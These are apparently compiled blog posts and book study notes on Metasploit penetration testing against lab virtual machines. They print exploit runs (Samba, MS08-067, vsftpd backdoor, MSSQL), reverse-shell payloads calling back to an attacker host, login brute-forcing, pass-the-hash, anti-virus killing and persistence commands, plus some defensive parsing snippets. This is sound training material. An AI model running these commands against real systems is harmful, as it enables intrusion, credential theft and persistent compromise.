  • Metasploit penetration testing
    2022-04-19 14:38:11


    Preface

    Metasploit is an open-source tool designed to make penetration testing easier. It is a modular framework written in Ruby, highly extensible and convenient for penetration testers to develop on.

    1. Metasploit's module structure

    1. Auxiliaries (auxiliary modules)
    2. Exploit (exploit modules)
    3. Payload (payload modules)
    4. Post (post-exploitation modules)
    5. Encoders (encoder modules)

    2. Attack steps

    1. Scan the target and its system
    2. Select and configure an exploit module
    3. Select and configure a payload module
    4. Choose an encoding technique to get past anti-virus detection
    5. Launch the exploit

    3. Exploitation

    Preparing the target machine

    Metasploitable2 is a purpose-built Ubuntu system used mainly for testing security tools and demonstrating common vulnerability attacks.
    Download address:

    https://information.rapid7.com/download-metasploitable-2017.html

    Log in with msfadmin as both the username and the password.

    Exploitation process

    Start msf in Kali

    msfconsole

    Scan the target's service versions

    nmap -sV ip (where ip is the target machine's IP)

    After collecting information about the target, choose the exploit and the payload.

    Selecting the exploit module

    Here we find that a Samba 3.x service is running.
    Use the search samba command to look up Samba exploits and pick a suitable exploit module.
    The results are sorted by exploitation difficulty.
    Here we use the exploit/multi/samba/usermap_script exploit module.

    use exploit/multi/samba/usermap_script
    show payloads (list the usable payload modules)
    show options (show the module's settings and which ones are required)

    Parameters marked yes are required.

    Configuring the exploit module

    Set the chosen payload module

    set payload cmd/unix/reverse (note that the payload must match the target's operating system, which here is Linux)

    Set the target IP

    set RHOST 192.168.x.xxx

    Set the port to exploit

    set RPORT 445

    Set the IP of the attacking host

    set LHOST 192.168.x.xxx

    Launching the attack

    After setting the parameters, launch the attack with

    exploit (or run)

    This establishes a shell connection between the attacking machine and the target, through which arbitrary commands can be executed.
    Commands such as hostname, uname -a, ifconfig and so on can then be entered to query the target.


    Contents

    Penetration testing process overview

    Order

    Penetration standards

    Penetration phases

    Environment setup

    Network topology

    Virtual machine images

    Attacker machine: Kali

    Target: portal website, OWASP BWA

    Target: gateway, Metasploitable_Ubuntu

    Target: server, Win2K3 Metasploitable

    Target: intranet, WinXP SP3 Metasploitable

    References


    Penetration testing process overview

    Order

    • Pre-attack (footprinting, network scanning, enumeration)
    • Attack (using the vulnerability information to penetrate and gain privileges)
    • Post-attack (maintaining access, copying files, implanting trojans, wiping traces)

    Penetration standards

    • OSSTMM (Open Source Security Testing Methodology Manual)
    • NIST SP800-42 Guideline on Network Security Testing
    • OWASP Top 10 web application security threats project
    • Web security threat classification standard
    • PTES Penetration Testing Execution Standard

    Penetration phases

    Pre-engagement interaction phase

    Scope of the test, targets, constraints, service contract
    Collect client requirements, prepare the test plan, define the scope, define the business objectives

    Intelligence gathering phase

    Public information queries
    Google Hacking
    Social engineering
    Footprinting
    Scanning and probing
    Passive listening
    Service enumeration

    Threat modeling phase

    Vulnerability analysis phase

    Combine the vulnerability scan results with the service enumeration information
    Hunt for vulnerabilities in the key system services

    Public repositories

    • CNNVD
    • CNVD
    • WooYun vulnerability report platform
    • SCAP Chinese community
    • CVE
    • NVD
    • SecurityFocus
    • OSVDB
    • Seebug
    • Butian

    Exploitation phase

    Post-exploitation analysis phase

    Reporting phase

    Environment setup

    Network topology

    (screenshot: environment to be built)

    Configure VMware on the same subnet as the host

    (screenshots: VMnet1, VMnet8, NAT settings)

    Note: in the DHCP settings the end IP address should end in 255; otherwise the later port scan of the .254 host will fail.

    (screenshots: DHCP settings, host ipconfig)

    Virtual machine images

    Select the .vmx file, open it with VMware, and choose "I copied it".

    BT5 is too old and everyone uses Kali now, so I replaced it with Kali. Next comes the configuration of each virtual machine.

    dvssc environment

    VM                         Role                   IP                               Domain name           Segment
    kali                       initial attacker       192.168.31.128                   attacker.dvssc.com    DMZ
    OWASP BWA                  portal web server      192.168.31.129                   www.dvssc.com         DMZ
    Win2K3 Metasploitable      back-end server        192.168.31.130                   service.dvssc.com     DMZ
    Metasploitable_ubuntu      gateway server         192.168.10.254, 192.168.31.254   gate.dvssc.com        connects the DMZ and the corporate intranet
    WinXPenSP3 Metasploitable  intranet client host   192.168.10.128                   intranet1.dvssc.com   corporate intranet

    Attacker machine: Kali

    (screenshot: hardware settings)

    IP settings

    vim /etc/network/interfaces

    systemctl restart networking.service

    Use ifconfig to check that the IP change took effect.

    DNS settings

    vim /etc/resolv.conf

    The three DNS servers shown above generally all work. Ping Baidu to check that the machine has Internet access.

    (screenshot: ping to Baidu succeeds)

    Edit the host mappings

    vim /etc/hosts

    192.168.31.128 attacker.dvssc.com
    192.168.31.129 www.dvssc.com
    192.168.31.130 service.dvssc.com
    192.168.31.254 gate.dvssc.com

    For the machine itself, just use 127.0.0.1; this is not repeated for the later targets.

    (screenshot: editing the host mappings)

    Target: portal website, OWASP BWA

    (screenshot: hardware settings)

    The other setup steps are the same as above and are not repeated.

    If systemctl is not installed, use

    /etc/init.d/networking restart

    to restart networking. Enter the IP in a browser and the dvssc portal site should appear, which means this target is configured correctly.

    (screenshot: visiting the dvssc site)

    Target: gateway, Metasploitable_Ubuntu

    IP and DNS settings

    The commands are the same as before and are not repeated.

    As the gateway between the intranet and the external network it has two network interfaces, and both need to be configured.

    (screenshot: IP settings)

    Target: server, Win2K3 Metasploitable

    (screenshot: hardware settings)

    IP settings

    Open a cmd window and enter

    netsh
    int ip

    then change the address with

    set address name="Local Area Connection" source=static addr=192.168.31.130 mask=255.255.255.0 gateway=192.168.31.1 1

    (screenshot: setting the IP)

    Starting the Oracle service

    Follow oracle startup.txt on the desktop.

    C:\oracle\product\10.2.0\db_1\BIN\sqlplus.exe /nolog
    conn sys/mima1234 as sysdba
    startup
    exit

    (screenshot: starting the Oracle service)

    If you get ERROR: ORA-12560: TNS:protocol adapter error, start the service from My Computer -> Manage -> Services -> OracleServiceORCL.

    Target: intranet, WinXP SP3 Metasploitable

    IP configuration

    (screenshot: IP settings)

    Summary

    This post configured the DMZ and the intranet environment:

    • every machine got an IP, DNS and host mappings
    • the gateway Metasploitable_Ubuntu was configured with two IPs
    • the back-end server Win2K3 Metasploitable needs the Oracle service started
    • once configured, the DMZ machines can ping each other and the gateway, and the intranet can ping the gateway

    References

    "Metasploit Penetration Testing Devil Training Camp", chapters 1 and 2

    Next post: "Metasploit Penetration Testing Devil Training Camp": information gathering

  • Metasploit Penetration Testing Guide

    2020-12-07 22:01:14

    Contents

    1. Metasploit and nmap

    1. Import Nmap output into Metasploit

    2. Use nmap from within msf

    2. Targeted scanning

    1. SMB (Server Message Block) scan

    2. Finding misconfigured Microsoft SQL Servers

    3. SSH service scan

    4. FTP scan

    5. SNMP scan

    6. NetBIOS scan

    Vulnerability scanning

    Scanning with Nessus

    Dedicated vulnerability scanners: 1. Validating SMB logins

    2. Scanning for open VNC servers with no password

    3. Scanning for open X11 servers

    Exploitation

    1. Attacking Windows XP

    2. Attacking the Metasploitable host

    Meterpreter

    1. Scanning with nmap

    2. Attacking MS SQL

    xp_cmdshell

    Basic Meterpreter commands

    Attacking Metasploitable through the XP pivot

    Using Meterpreter scripts

    1. vnc

    2. Migrating processes

    3. Killing anti-virus software

    4. hashdump

    5. Viewing traffic on the target machine

    6. Collecting system information

    7. Persistence

    8. Calling the Windows API through the bundled Railgun component


    Metasploit and nmap

    1. Import Nmap output into Metasploit

    nmap -T4 -Pn -sS -A -oX result.xml 192.168.0.0/24
    
    msf5 > db_status
    db_import /home/kali/result.xml
    hosts -c address
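As an added illustration (not part of the original notes) of what db_import does with an -oX file: the Python below parses Nmap's XML output into a host/service inventory and answers the question the first post asks of its scan, which hosts expose Samba. Element and attribute names follow Nmap's XML schema; the sample document is constructed, not a real scan.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Constructed sample of `nmap -oX` output (not a real scan), trimmed to the elements the
# parser reads: host/status, host/address, host/ports/port/state and port/service.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -T4 -Pn -sS -A -oX result.xml 192.168.0.0/24" start="0">
  <host>
    <status state="up"/>
    <address addr="192.168.0.104" addrtype="ipv4"/>
    <address addr="00:0C:29:AA:BB:CC" addrtype="mac"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="4.7p1"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn" product="Samba smbd" version="3.X"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="netbios-ssn" product="Samba smbd" version="3.X"/></port>
      <port protocol="tcp" portid="8080"><state state="closed"/><service name="http-proxy"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.168.0.105" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

@dataclass
class Service:
    port: int
    proto: str
    name: str
    product: str
    version: str

@dataclass
class Host:
    address: str
    mac: str
    services: list = field(default_factory=list)

def parse_nmap_xml(xml_text):
    """Return the live hosts with their open services: the data db_import stores
    and `hosts` / `services` later print."""
    root = ET.fromstring(xml_text)
    hosts = []
    for h in root.findall("host"):
        status = h.find("status")
        if status is None or status.get("state") != "up":
            continue  # hosts that did not answer carry no services
        ipv4 = h.find("address[@addrtype='ipv4']")
        mac = h.find("address[@addrtype='mac']")
        host = Host(address=ipv4.get("addr") if ipv4 is not None else "",
                    mac=mac.get("addr") if mac is not None else "")
        for p in h.findall("ports/port"):
            state = p.find("state")
            if state is None or state.get("state") != "open":
                continue  # only open ports are worth inventorying
            svc = p.find("service")
            attr = (lambda k: svc.get(k, "")) if svc is not None else (lambda k: "")
            host.services.append(Service(port=int(p.get("portid")), proto=p.get("protocol"),
                                         name=attr("name"), product=attr("product"),
                                         version=attr("version")))
        hosts.append(host)
    return hosts

def find_service(hosts, needle):
    """(address, port, product, version) for every open service whose product or
    name contains needle, case-insensitively; e.g. needle='samba' as in the first post."""
    needle = needle.lower()
    return [(h.address, s.port, s.product, s.version)
            for h in hosts for s in h.services
            if needle in (s.product + " " + s.name).lower()]
```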

     

    2. Use nmap from within msf

    db_nmap -sS -A 192.168.0.104
    services -u 

     

    2. Targeted scanning

    1. SMB (Server Message Block) scan

    msf5 > use auxiliary/scanner/smb/smb_version 
    msf5 auxiliary(scanner/smb/smb_version) > show options 
    msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.0.104
    RHOSTS => 192.168.0.104
    msf5 auxiliary(scanner/smb/smb_version) > run
    

     

    2. Finding misconfigured Microsoft SQL Servers

    msf5 > use auxiliary/scanner/mssql/mssql_ping 
    msf5 auxiliary(scanner/mssql/mssql_ping) > show options 
    msf5 auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 192.168.0.0/24
    RHOSTS => 192.168.0.0/24
    msf5 auxiliary(scanner/mssql/mssql_ping) > set THREADS 255
    THREADS => 255
    msf5 auxiliary(scanner/mssql/mssql_ping) > run
    

     

    3. SSH service scan

    msf5 > use auxiliary/scanner/ssh/ssh_version 
    msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.0.0/24
    RHOSTS => 192.168.0.0/24
    msf5 auxiliary(scanner/ssh/ssh_version) > set THREADS 100
    THREADS => 100
    msf5 auxiliary(scanner/ssh/ssh_version) > run
    

     

    4. FTP scan

    1. Version scan

    msf5 > use auxiliary/scanner/ftp/ftp_version 
    msf5 auxiliary(scanner/ftp/ftp_version) > show options 
    msf5 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.0.0/24
    RHOSTS => 192.168.0.0/24
    msf5 auxiliary(scanner/ftp/ftp_version) > set THREADS 100
    THREADS => 100
    msf5 auxiliary(scanner/ftp/ftp_version) > run
    

    2. Check whether anonymous login is allowed

    msf5 > use auxiliary/scanner/ftp/anonymous 
    msf5 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.0.0/24
    RHOSTS => 192.168.0.0/24
    msf5 auxiliary(scanner/ftp/anonymous) > set THREADS 100
    THREADS => 100
    msf5 auxiliary(scanner/ftp/anonymous) > run
    

     

    5. SNMP (Simple Network Management Protocol) scan

    msf5 > use auxiliary/scanner/snmp/snmp_login 
    msf5 auxiliary(scanner/snmp/snmp_login) > set RHOSTS 192.168.0.0/24
    RHOSTS => 192.168.0.0/24
    msf5 auxiliary(scanner/snmp/snmp_login) > set THREADS 100
    THREADS => 100
    msf5 auxiliary(scanner/snmp/snmp_login) > run
    

     

    6. NetBIOS scan

    msf5 > use auxiliary/scanner/netbios/nbname 
    msf5 auxiliary(scanner/netbios/nbname) > set RHOSTS 192.168.0.0/24
    RHOSTS => 192.168.0.0/24
    msf5 auxiliary(scanner/netbios/nbname) > set THREADS 100
    THREADS => 100
    msf5 auxiliary(scanner/netbios/nbname) > run
    

     

    Vulnerability scanning

    Scanning with Nessus

    dpkg -i Nessus-8.12.1-debian6_amd64.deb 
    /bin/systemctl start nessusd.service
    https://kali:8834/

    1. Import Nessus scan results

    msf5 > db_status
    [*] Connected to msf. Connection type: postgresql.
    msf5 > db_import /home/kali/Downloads/My_Basic_Network_Scan_vdxc5z.nessus
    
    
    
    msf5 > hosts -c address,svcs,vulns
    vulns    # list the vulnerabilities in detail

     

    2. Run a Nessus scan from within msf

    load nessus
    nessus_connect nessus:nessus@localhost:8834 ok    # connect to nessus
    nessus_policy_list       # list policies
    nessus_scan_new <UUID of Policy> <Scan name> <Description> <Targets>    # create a new scan
    nessus_scan_launch <scan id>      # launch the scan
    nessus_scan_list        # list scans
    nessus_db_import <scan id>      # import the results into the msf database
    

     

     

     

    Dedicated vulnerability scanners: 1. Validating SMB logins

    msf5 > use auxiliary/scanner/smb/smb_login
    msf5 auxiliary(scanner/smb/smb_login) > show options 
    msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.0.100-110
    RHOSTS => 192.168.0.100-110
    msf5 auxiliary(scanner/smb/smb_login) > set SMBUSER administrator
    SMBUSER => administrator
    msf5 auxiliary(scanner/smb/smb_login) > set SMBPASS 123
    SMBPASS => 123
    msf5 auxiliary(scanner/smb/smb_login) > set VERBOSE false    # do not print every attempt
    VERBOSE => false
    msf5 auxiliary(scanner/smb/smb_login) > run
    

     

    2. Scanning for open VNC servers with no password

    msf5 > use auxiliary/scanner/vnc/vnc_none_auth 
    msf5 auxiliary(scanner/vnc/vnc_none_auth) > show options 
    
    Module options (auxiliary/scanner/vnc/vnc_none_auth):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT    5900             yes       The target port (TCP)
       THREADS  1                yes       The number of concurrent threads (max one per host)
    
    msf5 auxiliary(scanner/vnc/vnc_none_auth) > set RHOSTS 192.168.0.105
    RHOSTS => 192.168.0.105
    msf5 auxiliary(scanner/vnc/vnc_none_auth) > run

    vncviewer 192.168.0.105    # connect with vnc
    

    3. Scanning for open X11 servers

     

    Exploitation

    1. Attacking Windows XP

    1. Scan with nmap

    nmap -sT -A --script=smb-vuln-ms08-067.nse -P0 192.168.0.106

     

    2. Search for and use the ms08_067 exploit module

    msf5 > search ms08_067
    msf5 > use exploit/windows/smb/ms08_067_netapi
    msf5 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf5 exploit(windows/smb/ms08_067_netapi) > show targets 
    msf5 exploit(windows/smb/ms08_067_netapi) > set target 10
    target => 10
    msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.0.106
    RHOSTS => 192.168.0.106
    msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.0.109
    LHOST => 192.168.0.109
    msf5 exploit(windows/smb/ms08_067_netapi) > set LPORT 8008
    LPORT => 8008
    msf5 exploit(windows/smb/ms08_067_netapi) > show options 
    msf5 exploit(windows/smb/ms08_067_netapi) > exploit 

     

    3. Sessions

    meterpreter > shell                                           # drop into a shell on the target
    C:\WINDOWS\system32>ipconfig
    meterpreter > background                                      # send the reverse shell to the background
    msf5 exploit(windows/smb/ms08_067_netapi) > sessions -l -v    # list the meterpreter sessions in detail
    msf5 exploit(windows/smb/ms08_067_netapi) > sessions -i 2     # interact with session id 2
    
    

     

    2. Attacking the Metasploitable host

    1. nmap scan

    nmap -sT -A -P0 192.168.0.105

     

    2. Search for the vsftpd exploit module

    search vsftpd
    msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads 
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact 
    payload => cmd/unix/interact
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.0.105
    RHOSTS => 192.168.0.105
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit 
    

     

     

    Meterpreter

    Install MS SQL on XP

    1. Scan with nmap

    nmap -sT -A -P0 192.168.0.106

     

    2. Attacking MS SQL

    2.1 Scan the target's UDP port 1434

    2.2 Use the mssql_ping module to find the MS SQL service port, then guess usernames and passwords

    msf5 > use auxiliary/scanner/mssql/mssql_ping 
    msf5 auxiliary(scanner/mssql/mssql_ping) > show options 
    msf5 auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 192.168.0.106
    RHOSTS => 192.168.0.106
    msf5 auxiliary(scanner/mssql/mssql_ping) > set THREADS 50
    THREADS => 50
    msf5 auxiliary(scanner/mssql/mssql_ping) > exploit 

     

    2.3 Brute-forcing the MS SQL service

    msf5 > use auxiliary/scanner/mssql/mssql_login 
    msf5 auxiliary(scanner/mssql/mssql_login) > show options 
    msf5 auxiliary(scanner/mssql/mssql_login) > set PASS_FILE /root/pass.txt
    PASS_FILE => /root/pass.txt
    msf5 auxiliary(scanner/mssql/mssql_login) > set THREADS 10
    THREADS => 10
    msf5 auxiliary(scanner/mssql/mssql_login) > set VERBOSE false
    msf5 auxiliary(scanner/mssql/mssql_login) > set USERNAME sa
    USERNAME => sa
    msf5 auxiliary(scanner/mssql/mssql_login) > set RHOSTS 192.168.0.106
    RHOSTS => 192.168.0.106
    msf5 auxiliary(scanner/mssql/mssql_login) > exploit 

     

    xp_cmdshell

    msf5 > use exploit/windows/mssql/mssql_payload
    msf5 exploit(windows/mssql/mssql_payload) > show options 
    msf5 exploit(windows/mssql/mssql_payload) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf5 exploit(windows/mssql/mssql_payload) > set LHOST 192.168.0.106
    LHOST => 192.168.0.106
    msf5 exploit(windows/mssql/mssql_payload) > set LPORT 5555
    LPORT => 5555
    msf5 exploit(windows/mssql/mssql_payload) > unset LHOST 
    Unsetting LHOST...
    msf5 exploit(windows/mssql/mssql_payload) > set LHOST 192.168.0.109
    LHOST => 192.168.0.109
    msf5 exploit(windows/mssql/mssql_payload) > set RHOSTS 192.168.0.106
    RHOSTS => 192.168.0.106
    msf5 exploit(windows/mssql/mssql_payload) > set PASSWORD 123
    PASSWORD => 123
    msf5 exploit(windows/mssql/mssql_payload) > exploit 
    

     

    Basic Meterpreter commands

    1. Screenshot

    meterpreter > screenshot
    Screenshot saved to: /home/kali/NCqEAJcr.jpeg
    

    2.sysinfo

    meterpreter > sysinfo 
    Computer        : XP-1A6862CF7BC
    OS              : Windows XP (5.1 Build 2600, Service Pack 2).
    Architecture    : x86
    System Language : zh_CN
    Domain          : MSHOME
    Logged On Users : 3
    Meterpreter     : x86/windows
    

    3. hashdump

    4. Pass the hash

    When hashes have been captured but cannot be cracked to plaintext in a short time, the hash can be passed instead, using the windows/smb/psexec module.

    msf5 > use windows/smb/psexec
    msf5 exploit(windows/smb/psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf5 exploit(windows/smb/psexec) > set LHOST 192.168.0.109
    LHOST => 192.168.0.109
    msf5 exploit(windows/smb/psexec) > set LPORT 443
    LPORT => 443
    msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.0.106
    RHOSTS => 192.168.0.106
    msf5 exploit(windows/smb/psexec) > set SMBPASS ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678
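Following on from the pass-the-hash step, an added defender-side check that is not part of the original notes: hashdump output in user:rid:LM:NT::: form can be audited for accounts whose LM hash is still stored (the weakest half of the pair, and the one the NoLMHash policy removes) and for empty passwords. The two constants are the well-known empty-LM and empty-NT hash values; apart from the LM:NT pair already shown on this page, the sample lines are constructed.

```python
import re

# Well-known constants: the LM hash of an empty (or not stored) password, and the
# NT hash (MD4 of the empty UTF-16LE string) of an empty password.
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_LM = EMPTY_LM_HALF * 2
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One hashdump line: user:rid:lmhash:nthash:::
HASHDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$")

# Constructed sample: the first line reuses the LM:NT pair shown on this page, the
# others are made-up values in the same format (not real account data).
SAMPLE_HASHDUMP = """\
Administrator:500:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy_user:1002:0011223344556677aabbccddeeff0011:fedcba9876543210fedcba9876543210:::
not a hashdump line
"""

def audit_hashdump(text):
    """Return {user: [findings]} for every well-formed line; an empty list means nothing to report."""
    report = {}
    for line in text.splitlines():
        m = HASHDUMP_RE.match(line.strip())
        if not m:
            continue  # skip anything that is not in hashdump format
        lm, nt = m.group("lm").lower(), m.group("nt").lower()
        findings = []
        if nt == EMPTY_NT:
            findings.append("empty password")
        if lm != EMPTY_LM:
            # LM splits the password into two 7-character halves hashed separately;
            # an empty second half means the password is at most 7 characters long.
            if lm[16:] == EMPTY_LM_HALF:
                findings.append("LM hash stored (password at most 7 characters)")
            else:
                findings.append("LM hash stored (password 8-14 characters)")
        report[m.group("user")] = findings
    return report

def accounts_needing_attention(text):
    """Users with at least one finding, in file order."""
    return [u for u, f in audit_hashdump(text).items() if f]
```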
    

     

     

    Attacking Metasploitable through the XP pivot

    1. Set up a route

    meterpreter > run get_local_subnets 
    msf5 > route add 192.168.0.0 255.255.255.0 2        # 192.168.0.0/24 is Metasploitable's network; 2 is the session id
    [*] Route added
    msf5 > route print 
    

    2. Attack

    msf5 > use exploit/unix/ftp/vsftpd_234_backdoor 
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact 
    PAYLOAD => cmd/unix/interact
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.0.105
    RHOSTS => 192.168.0.105
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > ifconfig
    

     

    Using Meterpreter scripts

    1. vnc

    meterpreter > run vnc
    meterpreter > run screen_unlock 

     

    2. Migrate processes

    run post/windows/manage/migrate

     

    3. Kill anti-virus software

    run killav

     

    4. hashdump

     

    5. View traffic on the target machine

    run packetrecorder -i 1
    

     

    6. Collect system information

    meterpreter > run scraper 
    

     

    7. Persistence

    meterpreter > run persistence -X -i 50 -p 443 -r 192.168.0.109    # -X start at boot, -i 50 reconnect every 50 seconds
    
    
    msf5 > use exploit/multi/handler 
    msf5 exploit(multi/handler) > show options
    msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) > exploit 
    
    

     

    8. Call the Windows API through the bundled Railgun component

     

  • Metasploit Penetration Testing Devil Training Camp (Zhuge Jianwei 诸葛建伟, Chen Libo 陈力波, Sun Songbai 孙松柏, Wang Yan 王衍, Tian Fan 田繁): study notes

    Metasploit Penetration Testing Devil Training Camp: study notes

    Legal basics

    The Cybersecurity Law of the People's Republic of China was adopted at the 24th session of the Standing Committee of the 12th National People's Congress on 7 November 2016, is hereby promulgated, and took effect on 1 June 2017.
    Article 20: The state supports enterprises and educational and training institutions such as universities and vocational schools in carrying out cybersecurity-related education and training, and adopts various means to cultivate cybersecurity talent and promote exchange among cybersecurity professionals.
    Article 27: No individual or organization may engage in activities that endanger cybersecurity, such as illegally intruding into others' networks, interfering with the normal functioning of others' networks, or stealing network data; may not provide programs or tools specifically used for intruding into networks, interfering with normal network functions and protective measures, stealing network data, or other activities that endanger cybersecurity; and, knowing that others are engaged in activities that endanger cybersecurity, may not provide them with technical support, advertising, payment settlement, or other assistance.
    Article 44: No individual or organization may steal or otherwise illegally obtain personal information, or illegally sell or illegally provide personal information to others.
    Article 46: All individuals and organizations shall be responsible for their use of the network, and may not set up websites or communication groups used for committing fraud, teaching criminal methods, making or selling prohibited or controlled items, or other illegal or criminal activities, and may not use the network to publish information relating to committing fraud, making or selling prohibited or controlled items, or other illegal or criminal activities.
    Article 48: Electronic information sent and application software provided by any individual or organization may not contain malicious programs, and may not contain information whose publication or transmission is prohibited by laws or administrative regulations.

    Preface

    These study notes cover the experiments in "Metasploit Penetration Testing Devil Training Camp"; for the theory see the book and other articles. While reading the book I found that some of the experimental methods no longer match the present day, so I wrote these notes: for example, Back Track 5 is no longer maintained and has become Kali Linux, and a Kali Linux virtual machine uses far more resources than running Kali Linux as a Windows app.

    Environment preparation

    Environment overview

    Environment              Purpose             Notes
    Linux Metasploitable     Linux target        download the VMware image
    WinXP Metasploitable     Windows target      download the VMware image
    OWASP BWA                web server target   download the VMware image
    Win2K3 Metasploitable    Windows target      download the VMware image
    Kali Linux               Linux attacker      install Metasploit/Kali Linux on the Windows 10 host

    Environment download

    Link: https://pan.baidu.com/s/1I-OkdUcTwEx-TDoTT29hsw?pwd=rjpi
    Extraction code: rjpi

    Environment deployment

    (screenshots: importing the virtual machines)

    VMware virtual network editor configuration

    (screenshots: virtual network editor settings)

    Although all targets should obtain their addresses via DHCP, for consistency with the book they are temporarily configured with static addresses.

    Linux Metasploitable network configuration

    vi /etc/network/interfaces
    
    auto lo
    iface lo inet loopback
    
    auto eth0
    iface eth0 inet static
    address 10.10.10.254
    netmask 255.255.255.0
    
    auto eth1
    iface eth1 inet static
    address 192.168.10.254
    netmask 255.255.255.0
    
    ifdown eth0
    ifdown eth1
    
    ifup eth0
    ifup eth1

    WinXP Metasploitable network configuration

    C:\Documents and Settings\Administrator>ipconfig
    Windows IP Configuration
    Ethernet adapter Local Area Connection:
            Connection-specific DNS Suffix  . :
            IP Address. . . . . . . . . . . . : 192.168.10.128
            Subnet Mask . . . . . . . . . . . : 255.255.255.0
            Default Gateway . . . . . . . . . : 192.168.10.254
    

    OWASP BWA network configuration

    vi /etc/network/interfaces
    
    auto lo
    iface lo inet loopback
    
    auto eth0
    iface eth0 inet static
    address 10.10.10.129
    netmask 255.255.255.0
    gateway 10.10.10.254
    
    ifdown eth0
    
    ifup eth0

    Win2K3 Metasploitable network configuration

    C:\Documents and Settings\Administrator>ipconfig
    Windows IP Configuration
    Ethernet adapter Local Area Connection:
       Connection-specific DNS Suffix  . :
       IP Address. . . . . . . . . . . . : 10.10.10.130
       Subnet Mask . . . . . . . . . . . : 255.255.255.0
       Default Gateway . . . . . . . . . : 10.10.10.254
    

    Sign of a successful network configuration

    The network is configured correctly when every machine can ping every other address. If ping works in one direction but not the other, the host firewall policy is probably blocking it, which is normal.

    ping 192.168.10.254
    ping 10.10.10.254
    ping 192.168.10.128
    ping 10.10.10.128
    ping 10.10.10.129
    ping 10.10.10.130
    

    Every IP in the environment has a corresponding DNS name, so configure the hosts file with the IP-to-name mappings.
    Note: before editing the hosts file, untick read-only in its properties and grant Everyone full control; after editing, tick read-only again and remove the Everyone entry.

    notepad C:\Windows\System32\drivers\etc\hosts
    
    10.10.10.128	attacker.dvssc.com
    10.10.10.129	www.dvssc.com
    10.10.10.130	service.dvssc.com
    10.10.10.254	gate.dvssc.com
    192.168.10.128	intranet1.dvssc.com
    

    Installing Metasploit/Kali Linux on the Windows 10 host

    Download Metasploit, double-click the msi to install it in the default location, then add c:/metasploit-framework to the PATH environment variable.
    https://windows.metasploit.com/

    Alternatively, install Kali Linux from the Windows 10 Store (in my tests Kali Linux could not run auxiliary-module scans because of its network configuration, so installing Metasploit directly is recommended; use the Kali Linux environment only for applications that can only be installed there).


    Getting to know msfconsole

    Run msfconsole

    msfconsole
    
    PS C:\Users\IDEA> msfconsole
    C:/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35: warning: Win32API is deprecated after Ruby 1.9.1; use fiddle directly instead
    
    
           =[ metasploit v6.1.38-dev-c252faf9388449dd3af4f0ab1288c0ce82fe4cf9]
    + -- --=[ 2212 exploits - 1171 auxiliary - 396 post       ]
    + -- --=[ 615 payloads - 45 encoders - 11 nops            ]
    + -- --=[ 9 evasion                                       ]
    
    Metasploit tip: To save all commands executed since start up
    to a file, use the makerc command
    
    msf6 >
    

    Using msfconsole
</gr_replreplace>
<gr_replace lines="1134" cat="clarify" orig="在MSF终端里看到了">
    Once "Command shell session 1 opened" appears in the MSF console, shell commands such as uname -a and whoami can be entered to see the operating system of the controlled host and the privileges of the account obtained.

    msf6 > search samba
    
    msf6 > use multi/samba/usermap_script
    
    msf6 exploit(multi/samba/usermap_script) > show payloads
    
    msf6 exploit(multi/samba/usermap_script) > set payload cmd/unix/bind_netcat
    
    msf6 exploit(multi/samba/usermap_script) > show options
    
    msf6 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.254
    
    msf6 exploit(multi/samba/usermap_script) > exploit
    
    msf6 exploit(multi/samba/usermap_script) > exploit
    
    [*] Started bind TCP handler against 10.10.10.254:4444
    [*] Command shell session 1 opened (0.0.0.0:0 -> 10.10.10.254:4444) at 2022-04-10 12:18:37 +0800
    

